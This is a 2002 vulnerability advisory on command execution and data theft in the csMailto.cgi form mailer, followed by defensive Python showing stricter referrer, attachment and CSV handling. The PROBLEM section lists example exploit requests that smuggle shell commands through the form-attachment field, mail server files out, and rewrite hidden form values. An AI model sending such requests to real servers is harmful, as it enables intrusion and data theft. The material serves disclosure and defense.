26th Sep 2002 [SBWID-5308]
COMMAND
CGIscript.net's csMailto.cgi remote command execution
SYSTEMS AFFECTED
??
PROBLEM
From Steve Gustin's [[email protected]] advisory:
Because the script stored all the form configuration data in hidden
fields in the actual form, once a user can bypass the referrer check
they can essentially do anything an administrator of the program could
do, plus some additional things that probably weren't intended.
The script doesn't even check for the full referrer, it only checks for
the presence of the server hostname in the referrer you send. For
example, if the script is
http://host.com/cgi-script/CSMailto/CSMailto.cgi then it will look for
"host.com" in the referer.
This method is inherently insecure and can be bypassed by:
- Creating a perl LWP script which could specify an arbitrary referrer.
- Using javascript or other means to modify the form values on the
generated CSMailto form and allowing the browser to send the original
(and valid) URL as a referrer.
- Creating a local form page with the target hostname in the path and
thus in the referrer that is sent when the form is submitted (eg:
C:\html\host.com\form.html)
- Creating a local html page with a simple link (see below) and the
target hostname in the path and thus in the referrer that is sent when
the link is clicked (eg: C:\html\host.com.html)
Some example exploits are as follows. Note, these all assume that the
referrer check was bypassed with one of the above methods.
- execute commands on server
CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&command=mailform
- execute command on server and mail output to anyone
CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|[email protected]&form-autoresponse=YES&command=mailform
- email server file to anyone
[email protected]&form-autoresponse=YES&command=mailform
- download/access form input (no referer check)
CSMailto has the option to "have the feedback exported to an external
file". These files are stored in CSV format and can be downloaded from:
CSMailto/export/FORM_NAME.csv
Form HTML files are often named after their form names and the
information is also stored in hidden fields in the actual form like so
"...formname=FORM_NAME...". Also, it's worth noting that the script
doesn't properly escape '"', ',', or newline ("\n") chars, so any CSV
data with those characters may get corrupted.
- use form to send email to anyone
[email protected][email protected]&form-subject=subject&form-results=body&command=mailform
As another example of the seriousness of this problem, as mentioned
above, you can simply load an existing CSMailto form, have your browser
(IE in this example) change some of the preset hidden form values, and
then click submit. Example:
- email server file to anyone
javascript:alert(document.forms[0]["form-attachment"].value="FILEPATH");
javascript:alert(document.forms[0]["form-autoresponse"].value="YES");
javascript:alert(document.forms[0]["Email"].value="[email protected]");
SOLUTION
None yet.
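The advisory reports no vendor fix. As an added illustration (not code from the page, from Steve Gustin, or from CGIscript.net), the following Python shows the two weaknesses the advisory describes side by side with a stricter alternative a maintainer could apply: the substring referrer test, which accepts any string containing the hostname, against a check that parses the Referer header and compares the host exactly; unescaped CSV export against proper quoting; and, as an assumption about how a file-attachment parameter could be constrained, a filename whitelist resolved inside a fixed directory. The script itself is assumed to be Perl; Python is used here only so the example is self-contained and runnable. The hostname host.com and the directory /srv/csmailto/attach are constructed sample values.

```python
import csv
import io
import os
import re
from urllib.parse import urlsplit


def weak_referer_check(referer: str, expected_host: str) -> bool:
    """The substring test the advisory describes: true whenever the
    hostname appears anywhere in the Referer string, so a local file
    path such as C:\\html\\host.com\\form.html also passes."""
    return expected_host in (referer or "")


def referer_allowed(referer: str, expected_host: str) -> bool:
    """Stricter check: parse the Referer as a URL, require http(s) and
    an exact (case-insensitive) host match. A file:// referrer, a
    look-alike host, or a host that merely contains the name all fail.
    (A forged header still passes; Referer checks are only a speed
    bump and must not be the sole authorisation for the form.)"""
    if not referer:
        return False
    parts = urlsplit(referer)
    if parts.scheme not in ("http", "https"):
        return False
    return (parts.hostname or "").lower() == expected_host.lower()


# Constructed sample directory; assumption about where attachments live.
ATTACH_DIR = "/srv/csmailto/attach"


def attachment_allowed(name: str, allowed_dir: str = ATTACH_DIR) -> bool:
    """Accept only a bare filename of safe characters, then confirm the
    resolved path still sits directly inside allowed_dir. Shell
    metacharacters, path separators and '..' are all rejected before any
    file is opened."""
    if not re.fullmatch(r"[A-Za-z0-9._-]+", name or ""):
        return False
    base = os.path.realpath(allowed_dir)
    path = os.path.realpath(os.path.join(allowed_dir, name))
    return os.path.dirname(path) == base and path != base


def unescaped_csv_line(fields) -> str:
    """Naive export: fields joined by commas with no quoting, so a value
    containing ',', '"' or a newline corrupts the row (the CSV problem
    the advisory notes)."""
    return ",".join(fields) + "\n"


def csv_line(fields) -> str:
    """Quote every field; embedded quotes are doubled and embedded
    newlines stay inside the quoted field, so the row round-trips."""
    buf = io.StringIO()
    csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n").writerow(fields)
    return buf.getvalue()


if __name__ == "__main__":
    local_file = "file:///C:/html/host.com/form.html"
    print("weak :", weak_referer_check(local_file, "host.com"))
    print("strict:", referer_allowed(local_file, "host.com"))
    print(csv_line(["a,b", 'say "hi"', "line1\nline2"]), end="")
```

The referrer functions take the raw header string, so they can be dropped in front of whichever request-handling code reads HTTP_REFERER; the CSV writer replaces a hand-rolled join. Note the comment in referer_allowed: even the strict version only rejects accidental or lazy bypasses, so the form configuration should not be trusted from hidden fields at all.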